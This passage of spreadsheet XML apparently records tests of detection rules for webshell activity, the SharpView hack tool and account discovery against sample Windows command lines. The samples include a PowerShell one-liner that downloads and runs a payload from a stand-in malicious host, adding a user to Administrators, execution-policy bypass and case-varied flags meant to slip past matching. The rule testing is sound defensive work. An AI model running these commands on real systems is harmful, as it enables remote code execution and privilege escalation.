      <c r="F565" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G565" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H565" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I565" s="43" t="n"/>
      <c r="J565" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K565" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="566" ht="15.75" customHeight="1" s="42">
      <c r="A566" s="43" t="n"/>
      <c r="B566" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C566" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D566" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E566" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F566" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G566" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H566" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I566" s="43" t="n"/>
      <c r="J566" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K566" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="567" ht="15.75" customHeight="1" s="42">
      <c r="A567" s="43" t="n"/>
      <c r="B567" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C567" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D567" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E567" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F567" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G567" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H567" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I567" s="36" t="n"/>
      <c r="J567" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K567" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="568" ht="15.75" customHeight="1" s="42">
      <c r="A568" s="43" t="n"/>
      <c r="B568" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C568" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D568" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E568" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F568" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G568" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H568" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I568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68" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K568" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="569" ht="15.75" customHeight="1" s="42">
      <c r="A569" s="43" t="n"/>
      <c r="B569" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C569" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D569" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E569" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -cOmMaNd "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F569" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G569" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H569" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I569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69" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K569" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="570" ht="15.75" customHeight="1" s="42">
      <c r="A570" s="43" t="n"/>
      <c r="B570" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C570" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D570" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E570" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOpRoFiLE -COmmAnD "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F570" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G570" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H570" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I570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70" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K570" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="571" ht="15.75" customHeight="1" s="42">
      <c r="A571" s="43" t="n"/>
      <c r="B571" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C571" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D571" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E571" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nopRoFIle -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F571" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G571" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H571" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I571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71" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K571" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="572" ht="15.75" customHeight="1" s="42">
      <c r="A572" s="43" t="n"/>
      <c r="B572" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C572" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D572" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E572" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noprOFiLe -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F572" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G572" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H572" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I572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572" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K572" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="573" ht="15.75" customHeight="1" s="42">
      <c r="A573" s="43" t="n"/>
      <c r="B573" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C573" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D573" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E573" s="36" t="inlineStr">
        <is>
          <t>ping.exe /n 4 10.10.10.10</t>
        </is>
      </c>
      <c r="F573" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G573" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H573" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I573" s="36" t="n"/>
      <c r="J573" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K573" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="574" ht="15.75" customHeight="1" s="42">
      <c r="A574" s="43" t="n"/>
      <c r="B574" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C574" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D574" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E574" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F574" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G574" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H574" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I574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574" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K574" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="575" ht="15.75" customHeight="1" s="42">
      <c r="A575" s="43" t="n"/>
      <c r="B575" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C575" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D575" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E575" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eC JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F575" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G575" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H575" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I575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575" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K575" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="576" ht="15.75" customHeight="1" s="42">
      <c r="A576" s="43" t="n"/>
      <c r="B576" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C576" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D576" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E576" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F576" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G576" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H576" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I576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576" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K576" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="577" ht="15.75" customHeight="1" s="42">
      <c r="A577" s="36" t="n"/>
      <c r="B577" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C577" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D577" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E577" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe -"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F577" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G577" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I577" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J577" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K577" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="578" ht="15.75" customHeight="1" s="42">
      <c r="A578" s="43" t="n"/>
      <c r="B578" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C578" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D578" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E578" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F578" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G578" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H578" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I578" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J578" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K578" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="579" ht="15.75" customHeight="1" s="42">
      <c r="A579" s="43" t="n"/>
      <c r="B579" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C579" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D579" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E579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579" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G579" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H579" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I579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579" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K579" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="580" ht="15.75" customHeight="1" s="42">
      <c r="A580" s="43" t="n"/>
      <c r="B580" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C580" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D580" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E580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580" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G580" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H580" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I580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580" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K580" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="581" ht="15.75" customHeight="1" s="42">
      <c r="A581" s="43" t="n"/>
      <c r="B581" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C581" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D581" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E581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581" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G581" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H581" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I58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581" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K581" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="582" ht="15.75" customHeight="1" s="42">
      <c r="A582" s="43" t="n"/>
      <c r="B582" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C582" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D582" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E582" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\Notepad.exe</t>
        </is>
      </c>
      <c r="F582" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G582" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H582" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I582" s="43" t="n"/>
      <c r="J582" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K582" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="583" ht="15.75" customHeight="1" s="42">
      <c r="A583" s="43" t="n"/>
      <c r="B583" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C583" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D583" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E583" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F583" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G583" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H583" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I583" s="43" t="n"/>
      <c r="J583" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K583" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="584" ht="15.75" customHeight="1" s="42">
      <c r="A584" s="43" t="n"/>
      <c r="B584" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C584" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D584" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E584" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F584" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G584" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H584" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I584" s="43" t="n"/>
      <c r="J584" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K584" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="585" ht="15.75" customHeight="1" s="42">
      <c r="A585" s="43" t="n"/>
      <c r="B585" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C585" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D585" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E585" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F585" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G585" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H585" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I585" s="43" t="n"/>
      <c r="J585" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K585" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="586" ht="15.75" customHeight="1" s="42">
      <c r="A586" s="43" t="n"/>
      <c r="B586" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C586" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D586" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E586" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F586" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G586" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H586" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I586" s="43" t="n"/>
      <c r="J586" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K586" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="587" ht="15.75" customHeight="1" s="42">
      <c r="A587" s="43" t="n"/>
      <c r="B587" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C587" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D587" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E587" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAND "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F587" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G587" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H587" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I587" s="43" t="n"/>
      <c r="J587" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K587" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="588" ht="15.75" customHeight="1" s="42">
      <c r="A588" s="43" t="n"/>
      <c r="B588" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C588" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D588" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E588" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F588" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G588" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H588" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I588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588" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K588" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="589" ht="15.75" customHeight="1" s="42">
      <c r="A589" s="43" t="n"/>
      <c r="B589" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C589" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D589" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E589" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOprOFILe -ep Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F589" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G589" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H589" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I589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589" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K589" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="590" ht="15.75" customHeight="1" s="42">
      <c r="A590" s="43" t="n"/>
      <c r="B590" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C590" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D590" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E590" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -ep Bypass -CommaNd "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F590" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G590" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H590" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I590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590" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K590" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="591" ht="15.75" customHeight="1" s="42">
      <c r="A591" s="43" t="n"/>
      <c r="B591" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C591" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D591" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E591" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F591" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G591" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H591" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I591" s="43" t="n"/>
      <c r="J591" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K591" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="592" ht="15.75" customHeight="1" s="42">
      <c r="A592" s="43" t="n"/>
      <c r="B592" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C592" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D592" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E592" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F592" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G592" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H592" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I592" s="43" t="n"/>
      <c r="J592" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K592" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="593" ht="15.75" customHeight="1" s="42">
      <c r="A593" s="43" t="n"/>
      <c r="B593" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C593" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D593" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E593" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F593" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G593" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H593" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I593" s="43" t="n"/>
      <c r="J593" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K593" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="594" ht="15.75" customHeight="1" s="42">
      <c r="A594" s="43" t="n"/>
      <c r="B594" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C594" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D594" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E594" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F594" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G594" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H594" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I594" s="43" t="n"/>
      <c r="J594" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K594" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="595" ht="15.75" customHeight="1" s="42">
      <c r="A595" s="43" t="n"/>
      <c r="B595" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C595" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D595" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E595" s="36" t="inlineStr">
